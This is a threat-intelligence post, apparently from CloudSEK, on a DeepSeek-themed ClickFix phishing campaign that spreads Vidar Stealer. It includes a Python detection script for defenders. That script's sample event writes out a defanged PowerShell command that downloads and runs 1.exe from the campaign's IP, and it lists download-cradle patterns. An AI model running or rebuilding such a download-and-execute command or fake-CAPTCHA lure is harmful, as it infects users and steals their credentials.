DeepSeek ClickFix Scam Exposed! Protect Your Data Before It’s Too Late

Cybercriminals are exploiting DeepSeek’s rising popularity to launch ClickFix phishing campaigns, tricking users into clicking fake CAPTCHA links that steal credentials and install malware like Vidar and Lumma Stealer. These attacks impersonate DeepSeek’s branding to appear legitimate, bypass security measures, and infect unsuspecting victims. CloudSEK’s Threat Research Team has uncovered a malicious domain distributing malware via deceptive verification buttons. Learn how to spot these scams, secure your accounts with MFA, and avoid becoming the next victim! Stay informed and shield your data NOW before it’s too late! 🔥

Anshuman Das
February 10, 2025
Green Alert

Executive Summary

Threat actors are exploiting the growing popularity of DeepSeek by launching phishing campaigns that use DeepSeek's brand name. These campaigns aim to steal credentials and distribute malware, including through fake investment schemes.

CloudSEK's Threat Research Team has discovered a domain used to spread Vidar Stealer malware through ClickFix phishing campaigns, a type of scam where victims are tricked into clicking on a malicious link that appears to be a captcha verification. These links often lead to the installation of malware, such as the Lumma Stealer mentioned in this report. A previous blog post, published in September of last year, explained this in detail.

Analysis and Attribution

Analysis of the Fake Domain

1. On 31 Jan 2025, CloudSEK’s contextual AI URL Analyser detected a domain named deepseekcaptcha[.]top. The domain was hosted behind Cloudflare and displayed a fake DeepSeek blogger-theme offer.

The fake domain impersonating DeepSeek Brandname in ClickFix campaign

2. The WHOIS record shows that the domain was registered on January 31, 2025. The domain sits behind Cloudflare's services to mask its origin hosting and evade detection by AI-based search engines, which allowed it to remain undetected for an extended period.

3. While analyzing the functionality and flow of the phishing site, it became apparent that clicking the “Verificate” button on the site's landing page copies a malicious PowerShell command to the clipboard; once the on-screen instructions are followed, a malicious file download begins.

The malicious fake captcha page downloads malware when the victim follows the steps

4. The highlighted command in the screenshot reveals that a file named 1.exe was downloaded to and then executed from the %TEMP% directory without any further user interaction. Checking the IP address 147.45.44[.]209, we found an open directory listing that exposes all the files and scripts used in the campaign.

Other samples of Vidar malware along with downloader script and HTA file present on IP 147.45.44[.]209

5. Based on primary static analysis of the downloaded file, 1.exe is classified as the first-stage downloader of Vidar Stealer, which is used to infect devices and steal information.

6. Further analysis revealed that the stealer has incorporated social media platforms, such as Telegram and Steam, into its infrastructure for updates and support as well as command-and-control (C2) functionality. The operators embed the C2 IP address/URL on a profile page, which the malware retrieves during the initial stage of execution.

Steam profile used to download the next-stage sample from the IP embedded as the profile username
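The chain in steps 3 and 4 (a PowerShell command pasted by the victim, a download cradle, a drop into %TEMP% and execution) leaves a recognisable process-creation footprint. The following Python is an added detection example, not CloudSEK's tooling or code from this report: it triages constructed Sysmon-style events and assumes the usual ClickFix paste into the Win+R Run dialog, which yields explorer.exe as the parent of the interpreter; the sample command line is defanged.

```python
"""Triage process-creation events for the ClickFix chain described above. Added
example, not CloudSEK's tooling; field names follow Sysmon Event ID 1."""
import re

# Constructed sample events. The IP and file name echo the report's indicators;
# the command line is defanged so it cannot be pasted and run.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr hxxp://147.45.44[.]209/1.exe '
                    r'-OutFile $env:TEMP\1.exe; Start-Process $env:TEMP\1.exe"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoProfile -File C:\Scripts\inventory.ps1"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -c Get-Process"},
]

# Command-line indicators: download cradles, %TEMP% drops, hidden windows.
CMDLINE_CHECKS = [
    ("download_cradle", re.compile(r"\b(iwr|invoke-webrequest|invoke-restmethod|"
                                   r"downloadstring|downloadfile|net\.webclient|"
                                   r"curl|wget|iex|invoke-expression)\b", re.I)),
    ("temp_dir_reference", re.compile(r"\$env:temp\b|%temp%|\\appdata\\local\\temp", re.I)),
    ("hidden_window", re.compile(r"-(w|windowstyle)\s+hidden\b", re.I)),
]
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]
def clickfix_indicators(event):
    """Return the ClickFix indicators present in one process-creation event."""
    hits = []
    # explorer.exe as parent is what pasting into the Win+R / Run dialog produces.
    if (_basename(event.get("Image", "")) in INTERPRETERS
            and _basename(event.get("ParentImage", "")) == "explorer.exe"):
        hits.append("interpreter_spawned_by_explorer")
    cmd = event.get("CommandLine", "")
    hits += [name for name, rx in CMDLINE_CHECKS if rx.search(cmd)]
    return hits

def is_clickfix_candidate(event):
    # Require the Run-dialog parent plus at least one command-line indicator;
    # a cradle launched from cmd.exe or a scheduler is routine admin activity.
    hits = clickfix_indicators(event)
    return "interpreter_spawned_by_explorer" in hits and len(hits) >= 2

def triage(events):
    return [(i, clickfix_indicators(e)) for i, e in enumerate(events)
            if is_clickfix_candidate(e)]
```

Only the first constructed event is flagged; the second shows that an ordinary script launched from the Run dialog does not trip the rule on its own.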

Recommendations

  • User Awareness and Education: The best defense against phishing attacks is a well-informed user base. Organizations and individuals should conduct regular security awareness training programs that educate users about the risks of phishing attacks and how to identify and avoid them. This includes:
    • Identifying Phishing Emails: Teach users to recognize the common signs of phishing emails, such as suspicious sender addresses, urgent requests for personal information, and links to unfamiliar websites.
    • Hover Before You Click: Encourage users to hover their mouse over links before clicking to verify the destination URL.
    • Verifying Website Authenticity: Advise users to check for the padlock symbol and "https://" in the address bar to ensure they are visiting a secure website.
    • Reporting Suspicious Activity: Establish a clear process for users to report suspicious emails or websites to the IT department.
  • Multi-Factor Authentication (MFA): Implementing MFA adds an extra layer of security by requiring users to provide multiple forms of verification before accessing sensitive accounts or systems. This can significantly reduce the risk of unauthorized access even if credentials are compromised.
  • Email Filtering and Anti-Phishing Solutions: Employ email filtering and anti-phishing solutions to detect and block malicious emails before they reach users' inboxes. These solutions can use a variety of techniques, such as signature-based detection, reputation analysis, and machine learning, to identify and quarantine phishing emails.
  • Network Segmentation: Segmenting the network can help to contain the spread of malware in the event of a successful phishing attack. By isolating critical systems and data from the rest of the network, organizations can limit the potential damage caused by a breach.
  • Incident Response Plan: Having a well-defined incident response plan in place can help organizations to respond quickly and effectively to phishing attacks. This plan should include procedures for identifying, containing, and eradicating the threat, as well as communicating with stakeholders.
  • Regular Software Updates: Keeping software and systems up to date with the latest security patches is crucial for mitigating vulnerabilities that can be exploited by threat actors.
  • Anti-Malware Software: Deploying anti-malware software on all endpoints can help to detect and remove malicious software that may be installed through phishing attacks.
  • Password Management: Encourage users to use strong, unique passwords for all of their accounts and to avoid reusing passwords across multiple sites. Consider implementing a password manager to help users manage their credentials securely.

By following these recommendations, organizations and individuals can significantly reduce their risk of falling victim to phishing attacks and protect themselves from the associated risks of data theft, financial loss, and reputational damage.

List of Indicators of Compromise

Following are the IOCs gathered from the campaign:


Appendix

Workflow of a generic ClickFix campaign used to distribute malware, Vidar Stealer in this case

Author

Anshuman Das

Threat Research @CloudSEK

